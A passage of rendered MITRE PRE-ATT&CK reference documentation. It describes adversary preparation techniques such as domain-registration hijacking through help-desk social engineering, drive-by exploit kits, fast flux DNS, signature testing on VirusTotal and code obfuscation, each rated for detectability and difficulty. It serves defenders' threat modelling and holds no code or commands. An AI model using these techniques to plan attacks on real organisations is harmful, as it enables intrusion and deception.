<p>Difficulty for the Adversary explanation: Requires adversary to gain access to an email account for person listed as the domain registrar/POC. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or take advantage of renewal process gaps.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1479. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1103">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1103</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1077"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1077"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1077">Analyze organizational skillsets and deficiencies - PRE-T1077</a></h3>
<div class="paragraph">
<p>Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This can be done offline after the data has been collected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1480. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1077">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1077</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conduct_active_scanning_pre_t1031"><a class="anchor" href="#_conduct_active_scanning_pre_t1031"></a><a class="link" href="#_conduct_active_scanning_pre_t1031">Conduct active scanning - PRE-T1031</a></h3>
<div class="paragraph">
<p>Active scanning is the act of sending transmissions to end nodes, and analyzing the responses, in order to identify information about the communications system. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This technique is an expected and voluminous activity when on the Internet. Active scanning techniques/tools typically generate benign traffic that does not require further investigation by a defender since there is no actionable defense to execute. The high volume of this activity makes it burdensome for any defender to chase and therefore often ignored.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Various available tools and data sources for scouting and detecting address, routing, version numbers, patch levels, protocols/services running, etc.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1481. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1031">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1031</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unconditional_client_side_exploitation_injected_website_driveby_pre_t1149"><a class="anchor" href="#_unconditional_client_side_exploitation_injected_website_driveby_pre_t1149"></a><a class="link" href="#_unconditional_client_side_exploitation_injected_website_driveby_pre_t1149">Unconditional client-side exploitation/Injected Website/Driveby - PRE-T1149</a></h3>
<div class="paragraph">
<p>A technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit&#8217;s landing page. The exploit kit landing page will probe the victim&#8217;s operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: With the use of malware detonation chambers (e.g., for web or email traffic), this improves detection. Encryption and other techniques reduces the efficacy of these defenses.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Placing an exploit on a public web site for driveby types of delivery is not impossible. However, gaining access to a web site with high enough traffic to meet specific objectives could be the challenge.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1482. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1149">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1149</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_test_signature_detection_pre_t1069"><a class="anchor" href="#_test_signature_detection_pre_t1069"></a><a class="link" href="#_test_signature_detection_pre_t1069">Test signature detection - PRE-T1069</a></h3>
<div class="paragraph">
<p>An adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don&#8217;t publicly publish results or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: If using a common service like [<a href="https://www.virustotal.com" class="bare">https://www.virustotal.com</a> VirusTotal], it is possible to detect. If the adversary uses a hostile, less well-known service, the defender would not be aware.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Easy to automate upload/email of a wide range of data packages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1483. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1069">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1069</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fast_flux_dns_pre_t1102"><a class="anchor" href="#_fast_flux_dns_pre_t1102"></a><a class="link" href="#_fast_flux_dns_pre_t1102">Fast Flux DNS - PRE-T1102</a></h3>
<div class="paragraph">
<p>A technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as IPS, domain registrars, and service providers are likely in the best position for detection.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Fast flux is generally simple for an adversary to set up and offers several advantages. Such advantages include limited audit trails for defenders to find, ease of operation for an adversary to maintain, and support for main nodes.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1484. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1102">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1102</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1026"><a class="anchor" href="#_conduct_social_engineering_pre_t1026"></a><a class="link" href="#_conduct_social_engineering_pre_t1026">Conduct social engineering - PRE-T1026</a></h3>
<div class="paragraph">
<p>Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: No technical means to detect an adversary collecting technical information about a target. Any detection would be based upon strong OPSEC policy implementation.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1485. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1026">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1026</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106"><a class="anchor" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106"></a><a class="link" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106">Acquire and/or use 3rd party infrastructure services - PRE-T1106</a></h3>
<div class="paragraph">
<p>A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Hard to differentiate from standard business operations.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Wide variety of cloud/VPS/hosting/compute/storage solutions available for adversary to acquire freely or at a low cost.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1486. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1106">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1106</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscate_or_encrypt_code_pre_t1096"><a class="anchor" href="#_obfuscate_or_encrypt_code_pre_t1096"></a><a class="link" href="#_obfuscate_or_encrypt_code_pre_t1096">Obfuscate or encrypt code - PRE-T1096</a></h3>
<div class="paragraph">
<p>Obfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Detecting encryption is easy, decrypting/deobfuscating is hard.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Various solutions exist for the adversary to use. This technique is commonly used to prevent attribution and evade detection.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1487. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1096">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1096</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1074"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1074"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1074">Analyze organizational skillsets and deficiencies - PRE-T1074</a></h3>
<div class="paragraph">
<p>Understanding organizational skillsets and deficiencies could provide insight in to weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: No access to who is consuming the job postings to know what is being observed.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Job postings have to be made public for contractors and many times have the name of the organization being supported.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1488. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1074">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1074</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_distribute_malicious_software_development_tools_pre_t1171"><a class="anchor" href="#_distribute_malicious_software_development_tools_pre_t1171"></a><a class="link" href="#_distribute_malicious_software_development_tools_pre_t1171">Distribute malicious software development tools - PRE-T1171</a></h3>
<div class="paragraph">
<p>An adversary could distribute malicious software development tools (e.g., compiler) that hide malicious behavior in software built using the tools. (Citation: PA XcodeGhost) (Citation: Reflections on Trusting Trust)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1489. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1171">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1171</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109"><a class="anchor" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109"></a><a class="link" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109">Acquire or compromise 3rd party signing certificates - PRE-T1109</a></h3>
<div class="paragraph">
<p>Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an signed piece of code even if they don&#8217;t know who issued the certificate or who the author is. (Citation: DiginotarCompromise)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1490. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1109">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1109</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_develop_social_network_persona_digital_footprint_pre_t1119"><a class="anchor" href="#_develop_social_network_persona_digital_footprint_pre_t1119"></a><a class="link" href="#_develop_social_network_persona_digital_footprint_pre_t1119">Develop social network persona digital footprint - PRE-T1119</a></h3>
<div class="paragraph">
<p>Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Unless there is some threat intelligence reporting, these users are hard to differentiate.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: The only difference between an adversary conducting this technique and a typical user, is the adversary&#8217;s intent - to target an individual for compromise.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1491. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1119">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1119</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_use_multiple_dns_infrastructures_pre_t1104"><a class="anchor" href="#_use_multiple_dns_infrastructures_pre_t1104"></a><a class="link" href="#_use_multiple_dns_infrastructures_pre_t1104">Use multiple DNS infrastructures - PRE-T1104</a></h3>
<div class="paragraph">
<p>A technique used by the adversary similar to Dynamic DNS with the exception that the use of multiple DNS infrastructures likely have whois records. (Citation: KrebsStLouisFed)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information. However, tracking multiple DNS infrastructures will likely require multiple tools/services or more advanced analytics.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires more planning, but feasible.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1492. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1104">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1104</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_vulnerabilities_in_third_party_software_libraries_pre_t1166"><a class="anchor" href="#_identify_vulnerabilities_in_third_party_software_libraries_pre_t1166"></a><a class="link" href="#_identify_vulnerabilities_in_third_party_software_libraries_pre_t1166">Identify vulnerabilities in third-party software libraries - PRE-T1166</a></h3>
<div class="paragraph">
<p>Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Open source software has great appeal mostly due to the time savings and that it is free. However, using this code without assessing it&#8217;s security is akin to blindly executing third party software. Companies often do not dedicate the time to appropriately detect and scan for vulnerabilities. The mainstream mobile application stores scan applications for some known vulnerabilities. For example, Google&#8217;s Android Application Security Improvement Program identifies and alerts developers to vulnerabilities present in their applications from use of the Vungle, Apache Cordova, WebView SSL, GnuTLS, and Vitamio third-party libraries. However, these scans are not likely to cover all vulnerable libraries, developers may not always act on the results, and the results may not be made available to impacted end users of the applications.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Developers commonly use open source libraries such that where an adversary can easily discover known vulnerabilities and create exploits. It is also generally easy to decompile arbitrary mobile applications to determine what libraries they use, and similarly use this information to correlate against known CVEs and exploit packages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1493. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1166">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1166</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dnscalc_pre_t1101"><a class="anchor" href="#_dnscalc_pre_t1101"></a><a class="link" href="#_dnscalc_pre_t1101">DNSCalc - PRE-T1101</a></h3>
<div class="paragraph">
<p>DNS Calc is a technique in which the octets of an IP address are used to calculate the port for command and control servers from an initial DNS request. (Citation: CrowdstrikeNumberedPanda) (Citation: FireEyeDarwinsAPTGroup) (Citation: Rapid7G20Espionage)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: There are not currently available tools that provide the ability to conduct this calculation to detect this type of activity.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This technique assists the adversary in bypassing egress filtering designed to prevent unauthorized communication. It has been used by APT12, but not otherwise widely reported. Some botnets are hardcoded to be able to use this technique.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1494. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1101">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1101</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_compromise_of_externally_facing_system_pre_t1165"><a class="anchor" href="#_compromise_of_externally_facing_system_pre_t1165"></a><a class="link" href="#_compromise_of_externally_facing_system_pre_t1165">Compromise of externally facing system - PRE-T1165</a></h3>
<div class="paragraph">
<p>Externally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and boarder routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Most DMZs are monitored but are also designed so that if they are compromised, the damage/risk is limited.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: DMZ environments are specifically designed to be isolated because one assumes they will ultimately be compromised by the adversary.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1495. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1165">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1165</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1023"><a class="anchor" href="#_identify_supply_chains_pre_t1023"></a><a class="link" href="#_identify_supply_chains_pre_t1023">Identify supply chains - PRE-T1023</a></h3>
<div class="paragraph">
<p>Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1496. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1023">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1023</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dumpster_dive_pre_t1063"><a class="anchor" href="#_dumpster_dive_pre_t1063"></a><a class="link" href="#_dumpster_dive_pre_t1063">Dumpster dive - PRE-T1063</a></h3>
<div class="paragraph">
<p>Dumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Strong physical security and monitoring will detect this behavior if performed on premises.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Not difficult if waste is placed in an unsecured or minimally secured area before collection.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1497. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1063">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1063</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obtain_domain_ip_registration_information_pre_t1028"><a class="anchor" href="#_obtain_domain_ip_registration_information_pre_t1028"></a><a class="link" href="#_obtain_domain_ip_registration_information_pre_t1028">Obtain domain/IP registration information - PRE-T1028</a></h3>
<div class="paragraph">
<p>For a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Open access to DNS registration/routing information is inherent in Internet architecture.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Proliferation of DNS information makes registration information functionally freely available.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1498. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1028">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1028</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_business_relationships_pre_t1060"><a class="anchor" href="#_identify_business_relationships_pre_t1060"></a><a class="link" href="#_identify_business_relationships_pre_t1060">Identify business relationships - PRE-T1060</a></h3>
<div class="paragraph">
<p>Business relationship information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: 11StepsAttackers)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Exception to the rule is if the adversary tips off the target that others have been asking about the relationship with them.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires an intensive process. In some industries, business relationships may be public in order to generate business, but this is not the case for all industries and all relationships.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1499. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1060">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1060</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_anonymity_services_pre_t1083"><a class="anchor" href="#_anonymity_services_pre_t1083"></a><a class="link" href="#_anonymity_services_pre_t1083">Anonymity services - PRE-T1083</a></h3>
<div class="paragraph">
<p>Anonymity services reduce the amount of information available that can be used to track an adversary&#8217;s activities. Multiple options are available to hide activity, limit tracking, and increase anonymity. (Citation: TOR Design) (Citation: Stratfor2012)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
